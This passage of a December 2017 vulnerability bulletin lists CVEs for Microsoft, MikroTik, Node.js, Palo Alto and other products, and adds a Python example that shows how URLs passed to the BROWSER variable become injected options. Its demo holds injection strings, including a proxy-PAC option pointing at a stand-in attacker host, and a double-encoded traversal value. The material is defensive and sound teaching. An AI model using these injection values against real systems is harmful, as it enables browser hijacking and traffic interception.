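The symlink case matters for the upload scenario: a check done on the string alone passes `escape/x`, while resolving first rejects it. Decoding only once is deliberate, since a server that decodes repeatedly can be fed `%252e%252e` to reach `..` after the check.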
mensis -- mensis
 
uiutil.c in Mensis 0.0.080507 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17521.2017-12-14not yet calculatedCVE-2017-17534
MISC
metview -- metview
 
etc/ObjectList in Metview 4.7.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17515
MISC
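The BROWSER rows in this bulletin (FontForge, Geomview, GNU GLOBAL, KildClient, Kiwi, LilyPond, Mensis and Metview above) share one bug: a URL taken from a document is handed to the program named in the BROWSER environment variable without checking that it is a URL, so a string such as `--proxy-pac-file=...` (the LilyPond demonstration) arrives as a browser option. The functions below are an added example for this bulletin, not code from any of those projects; they build argv only and never launch anything. The naive form models `system("$BROWSER $URL")`-style joining; the hardened form validates the URL before it can reach a command line and builds argv without a shell, honouring the `%s` placeholder that the BROWSER convention allows.

```python
import shlex
from urllib.parse import urlsplit


def launch_naive(browser_env, url):
    """The vulnerable shape: BROWSER and the URL are joined into one command
    line. A URL that begins with '-' lands in argv as an option, and any
    whitespace in it produces extra arguments. Returns the child's argv."""
    return shlex.split(browser_env + " " + url)


def validate_url(url):
    """Accept only absolute http(s) URLs whose text can neither look like an
    option nor split into several arguments. Raises ValueError otherwise."""
    if not url or url[0] == "-":
        raise ValueError("URL looks like a command-line option")
    if any(ch.isspace() or ord(ch) < 0x20 or ch == "\x7f" for ch in url):
        raise ValueError("URL contains whitespace or control characters")
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if not parts.hostname:
        raise ValueError("URL has no host")
    return url


def is_acceptable_url(url):
    try:
        validate_url(url)
        return True
    except ValueError:
        return False


def launch_hardened(browser_env, url):
    """Validate first, then build argv without a shell. BROWSER may contain a
    %s placeholder for the URL; if it does not, the URL is appended. Because
    validation guarantees the string starts with http(s)://, it cannot be
    parsed as an option by the browser."""
    url = validate_url(url)
    argv = shlex.split(browser_env)
    if not argv:
        raise ValueError("BROWSER is unset")
    if any("%s" in arg for arg in argv):
        return [arg.replace("%s", url) for arg in argv]
    return argv + [url]


if __name__ == "__main__":
    evil = "--proxy-pac-file=http://evil.example/pac.js"
    print("naive    :", launch_naive("firefox", evil))
    print("naive    :", launch_naive("chromium", "http://a.example/ --disable-web-security"))
    print("hardened :", launch_hardened("w3m %s", "https://example.org/"))
    print("hardened :", is_acceptable_url(evil))
```

The resulting argv is meant for `subprocess.Popen(argv)` (no `shell=True`), which is what makes the whitespace and metacharacter classes harmless even if a future change loosened the character check.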
micro_focus -- project_and_portfolio_management_center
 
Man-In-The-Middle vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Man-in-the-middle attack.2017-12-12not yet calculatedCVE-2017-14361
CONFIRM
micro_focus -- project_and_portfolio_management_center
 
Cross-Site Request Forgery vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Cross-Site Request Forgery attack.2017-12-12not yet calculatedCVE-2017-14362
CONFIRM
microsoft -- chakracore
 
ChakraCore allows an attacker to execute arbitrary code in the context of the current user, due to how the ChakraCore scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11916
BID
CONFIRM

microsoft -- device_guard

Device Guard in Windows 10 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows a security feature bypass vulnerability due to the way untrusted files are handled, aka "Microsoft Windows Security Feature Bypass Vulnerability".2017-12-12not yet calculatedCVE-2017-11899
BID
SECTRACK
CONFIRM
microsoft -- exchange_server
 
Microsoft Exchange Server 2016 CU5 allows a spoofing vulnerability due to the way Outlook Web Access (OWA) validates web requests, aka "Microsoft Exchange Spoofing Vulnerability".2017-12-12not yet calculatedCVE-2017-11932
BID
SECTRACK
CONFIRM

microsoft -- internet_explorer

Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11906 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11887
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11901
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11903
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11913
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11907
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11906
BID
SECTRACK
CONFIRM
microsoft -- malware_protection_engine
 
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016, Windows Server, version 1709, and Microsoft Exchange Server 2013 and 2016 does not properly scan a specially crafted file, leading to remote code execution, aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability". This is different than CVE-2017-11937.2017-12-08not yet calculatedCVE-2017-11940
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Microsoft Edge handles objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability".2017-12-12not yet calculatedCVE-2017-11888
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore, Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11912
BID
SECTRACK
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11893
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11918
BID
SECTRACK
CONFIRM

microsoft -- multiple_products
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11894
Source & Patch Info: BID, SECTRACK, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11895
Source & Patch Info: BID, SECTRACK, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11911
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11890
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11889
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11909
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11910
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11908
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11914
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, and CVE-2017-11916.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11930
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11905
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- multiple_products
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016, and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11906.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11919
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- office_2016_click-to-run
Microsoft Office 2016 Click-to-Run (C2R) allows a remote code execution vulnerability due to the way files are handled in memory, aka "Microsoft Excel Remote Code Execution Vulnerability".
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11935
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- office_2016_click-to-run
Microsoft Office 2016 Click-to-Run (C2R) allows an information disclosure vulnerability due to the way Microsoft Office enforces DRM copy/paste permissions, aka "Microsoft Office Information Disclosure Vulnerability".
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11939
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- office
Microsoft Office 2013 RT SP1, Microsoft Office 2013 SP1, and Microsoft Office 2016 allow an information disclosure vulnerability due to the way certain functions handle objects in memory, aka "Microsoft Office Information Disclosure Vulnerability".
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11934
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- sharepoint_enterprise_server_2016
Microsoft SharePoint Enterprise Server 2016 allows an elevation of privilege vulnerability due to the way web requests are handled, aka "Microsoft SharePoint Elevation of Privilege Vulnerability".
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11936
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- windows
Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka "Windows RRAS Service Remote Code Execution Vulnerability".
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11885
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- windows
Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11886
Source & Patch Info: BID, SECTRACK, CONFIRM

microsoft -- windows
Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow an information disclosure vulnerability due to the way the Windows its:// protocol handler determines the zone of a request, aka "Microsoft Windows Information Disclosure Vulnerability".
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-11927
Source & Patch Info: BID, SECTRACK, CONFIRM

mikrotik -- multiple_devices
MikroTik v6.40.5 devices allow remote attackers to cause a denial of service via a flood of ICMP packets.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17538
Source & Patch Info: EXPLOIT-DB

mikrotik -- routerboard
MikroTik RouterBOARD v6.39.2 and v6.40.5 allows an unauthenticated remote attacker to cause a denial of service by connecting to TCP port 53 and sending data that begins with many '\0' characters, possibly related to DNS.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17537
Source & Patch Info: EXPLOIT-DB

mobotap -- dolphin_browser_for_android
The Backup and Restore feature in Mobotap Dolphin Browser for Android 12.0.2 suffers from an arbitrary file write vulnerability when attempting to restore browser settings from a malicious Dolphin Browser backup file. This arbitrary file write vulnerability allows an attacker to overwrite a specific executable in the Dolphin Browser's data directory with a crafted malicious executable. Every time the Dolphin Browser is launched, it will attempt to run the malicious executable from disk, thus executing the attacker's code.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17551
Source & Patch Info: MISC

mobotap -- dolphin_browser_for_android
The Dolphin Browser for Android 12.0.2 suffers from an insecure parsing implementation of the Intent URI scheme. This vulnerability could allow attackers to abuse this implementation through a malicious Intent URI, in order to invoke private Activities within the Dolphin Browser.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17553
Source & Patch Info: MISC

nip2 -- nip2
** DISPUTED ** boxes.c in nip2 8.4.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer indicates that this product does not use the BROWSER environment variable.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17514
Source & Patch Info: MISC

node.js -- node.js
Node.js was affected by OpenSSL vulnerability CVE-2017-3737 in regards to the use of SSL_read() due to TLS handshake failure. The result was that an active network attacker could send application data to Node.js using the TLS or HTTP2 modules in a way that bypassed TLS authentication and encryption.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15896
Source & Patch Info: CONFIRM

node.js -- node.js
Node.js had a bug in versions 8.X and 9.X which caused buffers to not be initialized when the encoding for the fill value did not match the encoding specified. For example, 'Buffer.alloc(0x100, "This is not correctly encoded", "hex");' The buffer implementation was updated such that the buffer will be initialized to all zeros in these cases.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15897
Source & Patch Info: CONFIRM

ocaml -- ocaml_batteries_included
batteriesConfig.mlp in OCaml Batteries Included (aka ocaml-batteries) 2.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17519
Source & Patch Info: MISC

octopus -- octopus_deploy
In Octopus Deploy before 4.1.3, the machine update process doesn't check that the user has access to all environments. This allows an access-control bypass because the set of environments to which a machine is scoped may include environments in which the user lacks access.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17665
Source & Patch Info: CONFIRM

openstack -- openstack
A resource-permission flaw was found in the openstack-tripleo-heat-templates package where ceph.client.openstack.keyring is created as world-readable. A local attacker with access to the key could read or modify data on Ceph cluster pools for OpenStack as though the attacker were the OpenStack service, thus potentially reading or modifying data in an OpenStack Block Storage volume.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-12155
Source & Patch Info: CONFIRM, CONFIRM

palo_alto_networks -- globalprotect_agent
Palo Alto Networks GlobalProtect Agent before 4.0.3 allows attackers with administration rights on the local station to gain SYSTEM privileges via vectors involving "image path execution hijacking."
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15870
Source & Patch Info: BID, CONFIRM

palo_alto_networks -- pan-os
The configuration file import for applications, spyware and vulnerability objects functionality in the web interface in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, and 7.1.x before 7.1.14 allows remote attackers to conduct server-side request forgery (SSRF) attacks and consequently obtain sensitive information via vectors related to parsing of external entities.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15943
Source & Patch Info: BID, SECTRACK, CONFIRM

palo_alto_networks -- pan-os
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.13, and 8.0.x before 8.0.6 allows remote attackers to cause a denial of service via vectors related to the management interface.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15942
Source & Patch Info: BID, SECTRACK, CONFIRM

palo_alto_networks -- pan-os
The web interface packet capture management component in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote authenticated users to execute arbitrary code via unspecified vectors.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15940
Source & Patch Info: BID, SECTRACK, CONFIRM

palo_alto_networks -- pan-os
